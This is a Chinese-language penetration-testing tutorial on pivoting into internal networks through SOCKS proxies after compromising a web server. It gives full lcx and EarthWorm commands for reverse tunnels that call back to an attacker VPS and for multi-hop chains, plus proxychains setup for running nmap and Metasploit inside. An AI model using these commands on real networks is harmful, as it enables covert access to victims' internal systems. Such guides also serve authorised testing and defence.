内网漫游之SOCKS代理技术详解<\/h1>

0x01 引言<\/h2>

SOCKS代理是内网渗透中极为重要的技术手段，相比传统的端口转发工具如nc、lcx等，SOCKS代理具有以下优势：<\/p>

支持一对多端口映射，无需为每个端口单独建立转发<\/li>
支持多种协议（HTTP、FTP等）<\/li>

适用于更复杂的网络环境，特别是当目标服务器：

处于内网但可以访问外部网络<\/li>
处于外网但防火墙限制了敏感端口<\/li>

处于内网且只开放80端口，无法直接访问外网<\/li> <\/ul> <\/li> <\/ol>

SOCKS分为SOCKS4和SOCKS5两种类型：<\/p>

SOCKS4：仅支持TCP协议<\/li>

SOCKS5：支持TCP\/UDP协议，并提供多种身份验证机制<\/li> <\/ul>

0x02 渗透环境示例<\/h2>

[My PC] ←→ [VPS 139.XXX.XX.113] ←→ [WEB服务器 10.48.128.25] ←→ [内网其他服务器]
<\/code><\/pre>
假设已控制WEB服务器(10.48.128.25)，该服务器是连接外网和内网的关键节点。<\/p>
0x03 传统端口转发技术<\/h2>
使用lcx进行3389端口转发示例：<\/p>


在目标机器执行：<\/p>
lcx.exe -slave 139.XXX.XX.113 9000 10.48.128.25 3389
<\/code><\/pre>
将目标机器3389端口数据转发到VPS的9000端口<\/p>
<\/li>

在VPS执行：<\/p>
lcx.exe -listen 9000 5555
<\/code><\/pre>
将VPS 9000端口数据转发到5555端口<\/p>
<\/li>

通过mstsc连接VPS:5555即可访问内网3389端口<\/p>
<\/li>
<\/ol>
缺点：每个端口需要单独建立转发，效率低下。<\/p>
0x04 SOCKS代理工具推荐<\/h2>


EarthWorm (EW)<\/strong><\/p>

支持SOCKS v5服务架设和端口转发<\/li>
支持正向、反向、多级级联<\/li>
跨平台(Linux\/Windows\/MacOS\/Arm-Linux)<\/li>
体积小(30-56KB)，无需依赖<\/li>
最新版为Termite<\/li>
<\/ul>
<\/li>

reGeorg<\/strong><\/p>

通过HTTP\/HTTPS隧道转发内网端口<\/li>
利用webshell建立SOCKS代理<\/li>
需要服务器支持aspx\/php\/jsp<\/li>
<\/ul>
<\/li>

sSocks<\/strong><\/p>

支持SOCKS5验证<\/li>
支持IPv6和UDP<\/li>
提供反向SOCKS代理<\/li>
<\/ul>
<\/li>

SocksCap64 (Windows)<\/strong><\/p>

全局代理软件<\/li>
使不支持SOCKS的应用程序也能通过代理<\/li>
<\/ul>
<\/li>

proxychains (Linux)<\/strong><\/p>

Linux下全局代理工具<\/li>
支持HTTP\/SOCKS4\/SOCKS5<\/li>
支持多代理链<\/li>
<\/ul>
<\/li>
<\/ol>
0x05 EarthWorm架设代理详解<\/h2>
EW有6种命令格式：<\/p>

ssocksd<\/code> - 正向SOCKS服务器<\/li>
rcsocks<\/code> - 反向SOCKS监听端<\/li>
rssocks<\/code> - 反向SOCKS服务端<\/li>
lcx_slave<\/code> - 端口转发从端<\/li>
lcx_listen<\/code> - 端口转发监听端<\/li>
lcx_tran<\/code> - 端口转发传输端<\/li>
<\/ul>
1. 正向SOCKS v5服务器<\/h3>
适用条件：目标机器有公网IP<\/p>
ew -s ssocksd -l 888
<\/code><\/pre>
在目标机器888端口架设SOCKS5代理<\/p>
2. 反弹SOCKS v5服务器<\/h3>
适用条件：目标机器无公网IP但可访问外网<\/p>
VPS上执行<\/strong>：<\/p>
ew -s rcsocks -l 1008 -e 888
<\/code><\/pre>
在VPS上添加转接隧道，将1008端口请求转给888端口<\/p>
目标机器执行<\/strong>：<\/p>
ew -s rssocks -d 139.XXX.XX.113 -e 888
<\/code><\/pre>
在目标机器启动SOCKS5服务并反弹到VPS的888端口<\/p>
3. 二级网络环境(一)<\/h3>
拓扑：<\/p>
[My PC] ←→ [VPS] ←→ [A主机] ←→ [B主机(内网)]
<\/code><\/pre>
B主机执行<\/strong>：<\/p>
ew -s ssocksd -l 888
<\/code><\/pre>
在B主机888端口架设SOCKS代理<\/p>
A主机执行<\/strong>：<\/p>
ew -s lcx_tran -l 1080 -f 10.48.128.49 -g 888
<\/code><\/pre>
将A主机1080端口请求转发到B主机的888端口<\/p>
4. 二级网络环境(二)<\/h3>
拓扑：<\/p>
[My PC] ←→ [VPS] ←→ [A主机] ←→ [B主机(内网)]
<\/code><\/pre>
VPS执行<\/strong>：<\/p>
ew -s lcx_listen -l 10800 -e 888
<\/code><\/pre>
B主机执行<\/strong>：<\/p>
ew -s ssocksd -l 999
<\/code><\/pre>
A主机执行<\/strong>：<\/p>
ew -s lcx_slave -d 139.XXX.XX.113 -e 888 -f 10.48.128.49 -g 999
<\/code><\/pre>
5. 三级网络环境<\/h3>
拓扑：<\/p>
[My PC] ←→ [VPS] ←→ [A主机] ←→ [B主机] ←→ [C主机(核心区)]
<\/code><\/pre>
VPS执行<\/strong>：<\/p>
ew -s rcsocks -l 1080 -e 888
<\/code><\/pre>
A主机执行<\/strong>：<\/p>
ew -s lcx_slave -d 139.XXX.XX.113 -e 888 -f 10.48.128.12 -g 999
<\/code><\/pre>
B主机执行<\/strong>：<\/p>
ew -s lcx_listen -l 999 -e 777
<\/code><\/pre>
C主机执行<\/strong>：<\/p>
ew -s rssocks -d 10.48.128.12 -e 777
<\/code><\/pre>
数据流：SOCKS V5 → 1080 → 888 → 999 → 777 → rssocks<\/p>
0x06 内网漫游实践<\/h2>
Windows下使用SocksCap64<\/h3>

安装并管理员权限运行SocksCap64<\/li>
添加代理服务器(IP和端口)<\/li>
测试连接<\/li>
右键程序选择"在代理隧道中运行"<\/li>
<\/ol>
可代理的程序：<\/p>

浏览器访问内网Web(如10.48.128.22:80)<\/li>
mstsc连接内网RDP(10.48.128.20:3389)<\/li>
Putty连接SSH(10.48.128.49:22)<\/li>
VNC客户端连接(10.48.128.25:5900)<\/li>
<\/ul>
Linux下使用proxychains<\/h3>

编辑配置文件：
vi \/etc\/proxychains.conf
<\/code><\/pre>
<\/li>
取消dynamic_chain<\/code>注释<\/li>
修改代理设置为SOCKS5 VPSIP 端口<\/li>
测试代理：
cp \/usr\/lib\/proxychains3\/proxyresolv \/usr\/bin\/
proxyresolv www.baidu.com
<\/code><\/pre>
<\/li>
使用代理运行程序：

proxychains firefox<\/code> - 代理浏览器<\/li>
proxychains nmap<\/code> - 代理扫描<\/li>
proxychains msfconsole<\/code> - 代理Metasploit<\/li>
<\/ul>
<\/li>
<\/ol>
总结<\/h2>
SOCKS代理是内网渗透中极为高效的技术手段，特别是EarthWorm工具因其小巧、跨平台、功能强大而成为首选。掌握正向、反向及多级代理的配置方法，配合SocksCap64或proxychains等客户端工具，可以高效地进行内网漫游和渗透测试。<\/p>